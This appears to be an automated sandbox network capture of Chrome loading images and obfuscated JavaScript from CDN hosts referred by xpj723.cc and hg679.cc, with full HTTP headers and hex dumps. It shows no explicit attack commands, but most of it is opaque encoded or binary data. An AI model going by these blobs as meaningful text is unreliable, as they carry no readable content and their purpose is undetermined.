                                                                                                                                                          Data Ascii: #:*@t@l|'o"L>9g}#gz@t.KD(t}K(}68-F8]-8$NK?}5,&p.->eZI#^G}w2 MBVb~okZG?gjsxVTr6pV#ZL1# X ($P4m::"o3Nw@j?


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          333192.168.2.55009823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC623OUTGET /fiximg/ac-20200404/fileupload/ll12/202307/202307192352577.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC555INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 27136
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE15[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473798
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a85c0465ab43c1fad07cb80e4d849272
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118202
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:10 UTC15829INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 33 69 36 78 44 54 79 76 47 31 53 46 6e 38 31 37 74 31 36 34 4e 6d 5a 4d 6d 4d 46 30 6f 68 37 36 32 47 64 30 42 41 70 4a 66 52 72 68 35 51 49 33 34 33 71 4e 37 74 65 4f 6e 76 42 56 5a 4e 58 6f 73 79 6f 64 75 75 70 76 6f 70 78 4e 72 66 59 6d 79 46 67 66 61 56 70 72 2f 6c 69 2f 68 34 35 56 75 43 41 74 62 6b 66 4e 52 51 4e 33 4f 4a 4a 4e 58 7a 49 4e 54 70 36 52 41 6d 39 75 2f 41 42 43 37 70 78 56 6d 31 73 79 55 79 43 49 5a 41 38 4e 68 67 70 72 63 58 32 53 6c 42 77 63 6b 46 49 6b 44 45 48 4f 6c 38 4c 44 51 31 78 66 74 47 45 69 31 58 68 34 50 66 6f 53 76 39 6b 78 4b 72 61 6d 4c 54 34 70 65 33 6f 6e 48 4a 53 6a 51 2b 6e 6e 35 72 61 69 45
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiE
                                                                                                                                                          2024-06-09 22:41:10 UTC11307INData Raw: 6c 46 36 79 6a 36 6d 61 43 36 41 56 49 36 58 33 77 50 33 66 30 42 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 51 4d 6f 4d 73 6a 68 34 71 75 55 46 54 78 6c 39 70 36 5a 31 62 55 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30
                                                                                                                                                          Data Ascii: lF6yj6maC6AVI6X3wP3f0BNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiQMoMsjh4quUFTxl9p6Z1bU28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          334192.168.2.55009623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC553OUTGET /pc/240516-03/static/js/t4044-otherConf-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 244
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:36 GMT
                                                                                                                                                          ETag: "6645cb70-f4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE16[3],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473799
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f799b6114ad64323a109f8c9d5e4a2a9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118201
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC244INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 46 67 46 30 41 61 41 62 77 43 49 42 57 41 4b 77 46 63 41 58 63 67 4c 67 44 4e 61 30 5a 36 42 4c 64 54 45 59 67 45 37 46 36 41 53 67 71 30 6b 49 41 41 52 4a 36 41 72 70 33 49 42 75 41 50 4a 68 71 49 54 67 44 6f 41 4a 69 42 5a 63 30 49 41 41 6f 43 55 45 45 41 50 6f 42 50 54 45 50 49 42 39 42 79 43 51 42 5a 46 44 74 6f 41 62 45 4f 54 49 41 33 4b 43 39 61 45 43 59 41 51 67 41 47 41 46 38 52 59 56 30 37 59 6e 49 59 4b 41 45 64 55 78 52 2f 4c 6a 30 42 41 46 45 41 44 78 68 67 76 54 38 32 44 6d 35 65 4d 51 45 51 65 6c 6f 42 4e 43 6c 61 47 4b 56 41 67 51 61 41 58 6d 78 79 59 41 41 76 63 6b 49 6f 70 71 41 3d 22 29
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgF0AaAbwCIBWAKwFcAXcgLgDNa0Z6BLdTEYgE7F6ASgq0kIAARJ6Arp3IBuAPJhqITgDoAJiBZc0IAAoCUEEAPoBPTEPIB9ByCQBZFDtoAbEOTIA3KC9aECYAQgAGAF8RYV07YnIYKAEdUxR/Lj0BAFEADxhgvT82Dm5eMQEQeloBNClaGKVAgQaAXmxyYAAvckIopqA=")


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          335192.168.2.55009090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC621OUTGET /fiximg/ac-20200404/fileupload/ll12/202312/202312222129050.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC540INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 8664
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[158],EU-GER-frankfurt-EDGE5-CACHE3[19,TCP_MISS,157],EU-FRA-paris-GLOBAL1-CACHE5[10],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 790123
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f995de40555f46baae89c2c73273f97b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:10 UTC8664INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 6e 38 62 30 35 50 6f 45 74 53 56 61 78 50 4b 61 52 53 6e 34 35 4e 43 56 74 61 39 66 58 78 63 62 2b 70 2b 44 54 38 71 71 6a 78 53 2b 65 4d 36 73 79 71 35 6b 39 41 4f 32 39 4c 51 63 31 53 32 42 4c 59 77 47 49 75 35 58 51 32 77 34 34 30 4b 47 4a 7a 46 4a 39 43 39 55 54 45 49 35 38 76 46 35 6d 52 54 79 63 61 4a 57 4c 6b 62 62 52 59 74 73 74 42 6e 42 37 31 61 73 62 74 4a 2b 46 44 49 6f 34 47 75 71 61 7a 78 6f 47 73 64 67 46 65 6a 6d 2b 6a 4b 6e 2f 74 4f 77 6a 6f 64 6d 6d 31 6f 50 32 78 6c 37 36 46 59 7a 44 72 45 2f 33 78 76 73 62 51 34 78 45 41 37 73 6c 41 61 4e 48 72 67 41 79 43 38 42 4a 6f 47 34 71 70 52 6c 49 4b 42 4b 34 57 39 36 31 41 66 51 67 41 36 75 41 74 50 4c 30 59 2b 4f 36 30 34 35 4b 50
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3n8b05PoEtSVaxPKaRSn45NCVta9fXxcb+p+DT8qqjxS+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbbRYtstBnB71asbtJ+FDIo4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          336192.168.2.55009590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC611OUTGET /pc/image-pc/index/312/parner/logo_italy.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 5894
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:56 GMT
                                                                                                                                                          ETag: "5d71fe88-1706"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[5],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE19[3],EU-FRA-paris-GLOBAL1-CACHE4[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465111
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a8dcc935c1e31c165b5e5db76e1ffdae
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126889
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC5894INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 29 00 00 00 3b 08 06 00 00 00 e6 7e a3 66 00 00 16 cd 49 44 41 54 68 43 9d 5a 09 78 55 d5 b5 fe f7 19 ef 98 9b dc 4c 64 24 48 20 21 61 26 06 30 da 06 5a fb 69 65 30 4c a9 d0 3a d4 aa 8f a2 3e e5 21 4e af 12 5a 4d ad 20 85 84 41 06 27 04 b5 50 25 48 a1 b5 a2 e0 50 b1 8a 32 18 94 39 21 01 12 32 90 3b df 73 ef 19 f6 fb f6 b9 b9 90 10 9e b6 3d df 77 e1 dc 93 73 f6 fe cf 5a 6b ff eb 5f 6b 5f 82 ff ec 20 f1 c7 28 ad ba 74 ce ae 2d 06 50 84 a2 4b d7 66 9a 37 7e 43 81 45 94 10 f3 32 fd 77 a7 ec 35 c1 f7 3c 4c f6 ec d9 c3 e7 e5 e5 09 8d 8d 8d 82 cf e7 23 a2 e8 27 81 80 64 8e d1 85 2e 48 c1 d8 79 cf 23 31 11 08 06 45 c3 ed 06 72 73 47 1a 76 bb 5d 6b 6c 6c d4 ca cb 27 e8 84 fc 6b 80 bf 17 64 55 55 15 b7 68 d1
                                                                                                                                                          Data Ascii: PNGIHDR);~fIDAThCZxULd$H !a&0Zie0L:>!NZM A'P%HP29!2;s=wsZk_k_ (t-PKf7~CE2w5<L#'d.Hy#1ErsGv]kll'kdUUh


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          337192.168.2.55009723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC549OUTGET /pc/240516-03/static/js/t4044-index-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 12652
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:36 GMT
                                                                                                                                                          ETag: "6645cb70-316c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE16[3],EU-FRA-paris-GLOBAL1-CACHE4[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473798
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6b7979d553c15a0e950c11ce039093b4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118202
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC12652INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 56 67 46 30 41 61 41 62 77 43 49 42 32 41 42 51 44 4d 41 57 63 67 4c 6c 6f 46 63 30 59 41 58 41 53 33 55 78 47 4b 64 69 61 41 4a 51 56 57 53 45 41 41 49 6b 6e 41 45 37 63 75 35 41 4e 77 42 35 4d 41 43 73 51 58 41 48 51 41 54 45 4c 57 35 6f 51 31 4f 53 67 67 67 35 6e 41 4a 36 59 68 35 41 50 71 4f 51 53 41 4c 49 6f 39 72 41 44 59 68 79 5a 41 44 63 6f 62 31 59 51 4a 67 42 43 41 41 59 41 58 78 46 68 66 58 74 69 63 68 67 4a 54 68 51 41 57 79 73 41 5a 53 73 41 78 52 41 41 49 52 51 41 44 33 38 32 44 68 34 2b 4d 54 6b 51 54 6c 59 35 4e 43 6b 41 51 56 6a 34 76 55 54 79 41 41 73 51 4b 41 4d 35 4d 76 59 75 58 6a 52 4d 61 74 72 36 78 71 68 57 74 41
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAVgF0AaAbwCIB2ABQDMAWcgLloFc0YAXAS3UxGKdiaAJQVWSEAAIknAE7cu5ANwB5MACsQXAHQATELW5oQ1OSggg5nAJ6Yh5APqOQSALIo9rADYhyZADcob1YQJgBCAAYAXxFhfXtichgJThQAWysAZSsAxRAAIRQAD382Dh4+MTkQTlY5NCkAQVj4vUTyAAsQKAM5MvYuXjRMatr6xqhWtA


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          338192.168.2.55010090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC641OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC625INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE12[7],EU-GER-frankfurt-GLOBAL1-CACHE7[0,TCP_HIT,6],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5235551be7d758f1c4f09d20cd9d9e3f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          339192.168.2.55009390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC381OUTGET /pc/image-pc/index/312/app/h5_icon.png.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC624INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 8521
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:27 GMT
                                                                                                                                                          ETag: "5d71fe6b-2149"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE3[15],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,14],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 677883a5a5a5ecca6926e813f1cb30e6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893226
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC8521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 6a 08 06 00 00 00 35 39 e6 d5 00 00 20 00 49 44 41 54 78 5e ed 9d 09 78 14 47 96 a0 5f 66 65 1d 92 aa 54 a5 5b e8 a8 43 02 71 b6 b9 c1 e6 32 36 98 c3 47 db 34 58 d8 34 ee b6 c7 de f5 f6 8e 67 c7 db 3d bb 9e de dd f6 60 ef ee 6c f7 7e eb 6d f7 b1 d3 d3 3b b8 7d e0 19 83 90 6d da 36 b7 30 f7 7d 63 8c d0 55 a5 2a 49 08 84 ae 3a 54 aa 2b 33 e7 7b 91 99 a5 2a a9 2a 2b 11 58 46 dd c4 f7 f1 01 55 91 99 11 7f bc 7c f1 e2 bd 17 51 14 7c c1 f5 01 05 e9 70 af 8c 1c 01 1e fc 14 7c c1 d9 81 02 db c8 3d f5 de 93 80 07 07 82 3f 06 14 3c 70 0f c7 08 12 e0 e1 38 82 df 06 14 3c 39 82 8f bd f7 28 1e fe 48 c1 76 f6 77 00 d4 bf bb 47 63 24 09 f0 ff 48 c1 17 ec 1b 40 51 af 8f e4 63 ff ec 9f c5 f3 6f 52 f0 39
